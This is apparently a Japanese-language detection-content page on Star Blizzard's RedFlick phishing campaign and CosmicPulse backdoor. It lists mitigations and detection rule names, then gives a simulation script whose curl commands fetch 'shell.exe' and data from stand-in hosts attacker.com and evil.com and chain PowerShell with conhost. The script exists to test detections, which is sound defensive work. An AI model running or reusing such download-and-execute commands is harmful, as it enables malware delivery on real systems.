スター・ブリザード、フィッシングとマルウェア展開の強化にRedFlickを使用
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
ロシア政府支援のアクターStar Blizzardが詳細構造を進化させ、RedFlick手法を用いてCosmicPulseバックドアを配信しています。このアクターは、非常に特化したスピアフィッシングから、侵害されたウェブサイトを使用した大規模な自動フィッシングキャンペーンに移行しました。これらのキャンペーンは、PDFファイル内に隠されたペイロードやVHDXファイルを含む高度な配信方法を利用して検出を回避します。
調査
Microsoft Threat Intelligenceは、2026年に観察されたさまざまなフィッシング波を分析し、ClickFixベースのチェーンからRedFlickスケジュールタスクへの移行を特定しました。この調査は、LNKファイル、SSHローカルコマンド実行、WebDAVを使用したリモートペイロード取得を含む多段階実行フローを詳述しています。技術分析では、CosmicPulseペイロードのステガノグラフィおよびレジストリベースの暗号化の使用も発見されました。
緩和策
組織は、フィッシングに強い認証と条件付きアクセスポリシーを実装してIDを保護する必要があります。エンドポイント保護はEDRをブロックモードで設定し、リアルタイムのウイルス対策保護を有効にする必要があります。さらに、攻撃表面低減ルールを実装して、難読化されたスクリプトや無許可の実行ファイルの実行を防ぐことができます。
対応
検出時には、セキュリティチームはEDRを活用して悪意のあるアーティファクトを修復し、疑わしいサインイン試行を調査する必要があります。自動調査と修復モードを有効にして応答時間を短縮します。組織はまた、高度なアンチフィッシングソリューションとゼロアワー自動削除(ZAP)を使用して、受信する悪意のある通信を無力化するべきです。
攻撃フロー
この部分はまだ更新中です。
検出
疑わしいコマンドラインでUNCパスが引数として実行ファイルを含む(cmdlineによる)
可能なネットワーク共有の発見(cmdlineによる)
疑わしいMsiExecリモートインストーラー隠しインストールの試み(cmdlineによる)
LOLBAS Conhost(cmdlineによる)
トンネリングツール使用の可能性 [Windows](cmdlineによる)
疑わしいCURL使用(cmdlineによる)
疑わしいコマンド&コントロールによる異常なトップレベルドメイン(TLD)DNSリクエスト(dnsによる)
IOC(HashSha256)で検出: Star BlizzardがRedFlick技術でフィッシングとマルウェア配送を洗練
IOC(SourceIP)で検出: Star BlizzardがRedFlick技術でフィッシングとマルウェア配送を洗練
IOC(DestinationIP)で検出: Star BlizzardがRedFlick技術でフィッシングとマルウェア配送を洗練
PowerShell実行の検出PDFからのダウンロード [Windows Powershell]
Star Blizzard RedFlick技術の検出 – スケジュールされたタスクとコマンドライン実行 [Windowsプロセス作成]
シミュレーション実行
-
攻撃ストーリー&コマンド: 敵対者は、悪意のあるファイルへのリンクを含むフィッシングメールを配信します。インタラクションすると、次の段階がトリガーされ、
curlが使用され、次段階がフェッチされます。システムプロセスに溶け込むために、コマンドはPowerShell,PDF(トリガーのソースを参照)とconhost.exeのロジックに合うようにコマンドライン文字列に組み込まれています。目標は、PDF構造内に埋め込まれたデコードされたペイロードを実行することです。 -
回帰テストスクリプト:
# 'Detect PowerShell Execution from Download PDF'ルールをトリガーするシミュレーションスクリプト。 # すべての必要なキーワードを含むコマンドライン文字列を構築します。 $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF" $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'PDFから抽出中...'; Start-Process conhost.exe}" # プロセスツリー/コマンドコンテキストにconhost.exeが含まれるようにcmdを介して実行 Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"PDFから抽出中... using conhost.exe`"" -
クリーンアップコマンド:
# シミュレーション中に生成されたファイルをクリーンアップ Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue